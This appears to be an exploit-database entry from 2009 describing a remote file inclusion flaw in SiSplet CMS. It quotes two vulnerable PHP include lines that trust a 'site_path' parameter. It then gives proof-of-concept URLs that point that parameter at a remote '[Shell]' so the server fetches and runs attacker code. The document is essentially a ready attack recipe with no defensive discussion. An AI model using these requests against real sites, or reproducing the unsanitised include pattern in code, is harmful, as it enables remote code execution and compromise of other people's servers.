[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit
# Published : 2009-12-07
# Author : cr4wl3r
# Previous Title : Chipmunk Newsletter Persistant XSS Vulnerability
# Next Title : Barracuda IMFirewall 620 Vulnerability
########################################################################
#SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit
########################################################################
########################################################################
3rr0r 1: ./SiSplet-2008-01-24/main/anketa/new.php (line 3)
<?php
require_once($site_path.'main/anketa/class.php');
?>
3rr0r 2: ./SiSplet-2008-01-24/main/forum/komentar.php (line 3)
<?php
require($site_path.'main/forum/class.php');
?>
########################################################################
########################################################################
PoC : http://[target]/[path]/main/anketa/new.php?site_path=[Shell]
http://[target]/[path]/main/forum/komentar.php?site_path=[Shell]
########################################################################
########################################################################
#Contact Me : cr4wl3r[4t]linuxmail[dot]org